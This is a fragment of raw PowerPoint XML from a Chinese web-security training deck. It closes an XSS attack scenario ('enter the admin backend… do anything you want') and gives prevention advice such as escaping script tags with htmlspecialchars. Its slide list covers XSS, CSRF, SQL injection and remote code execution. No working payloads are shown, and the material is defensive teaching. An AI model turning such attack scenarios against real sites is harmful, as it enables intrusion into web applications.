              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>进入后台。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Step 5.Do anything you want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>！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预防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用户提交数据的时候过滤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转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;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等标签。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>将用户提交的数据输出到页面的时候使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> 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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0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’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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>）对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>标记进行转义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CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="E:\工作相关\课程培训\200904091645317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7402" y="1600200"/>
            <a:ext cx="802919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1127</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>164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WEB安全</vt:lpstr>
      <vt:lpstr>主要内容</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>非持久型XSS示例</vt:lpstr>
      <vt:lpstr>持久型XSS示例</vt:lpstr>
      <vt:lpstr>一个XSS的应用场景</vt:lpstr>
      <vt:lpstr>XSS预防</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>防御CSRF</vt:lpstr>
      <vt:lpstr> SQL注入</vt:lpstr>
      <vt:lpstr> SQL注入</vt:lpstr>
      <vt:lpstr> SQL注入</vt:lpstr>
      <vt:lpstr> SQL注入</vt:lpstr>
      <vt:lpstr> SQL注入防御</vt:lpstr>
      <vt:lpstr> SQL注入防御</vt:lpstr>
      <vt:lpstr> SQL注入防御</vt:lpstr>
      <vt:lpstr> SQL注入防御</vt:lpstr>
      <vt:lpstr> 远程代码执行漏洞</vt:lpstr>
      <vt:lpstr> 远程代码执行漏洞</vt:lpstr>
      <vt:lpstr> 远程代码执行漏洞</vt:lpstr>
      <vt:lpstr>远程代码执行漏洞预防</vt:lpstr>
      <vt:lpstr>Web进程的权限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WEB安全</dc:title>
  <dc:creator>微软用户</dc:creator>
  <cp:lastModifiedBy>微软用户</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-11-08T01:53:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-16T12:54:59Z</dcterms:modified>
</cp:coreProperties>
</file>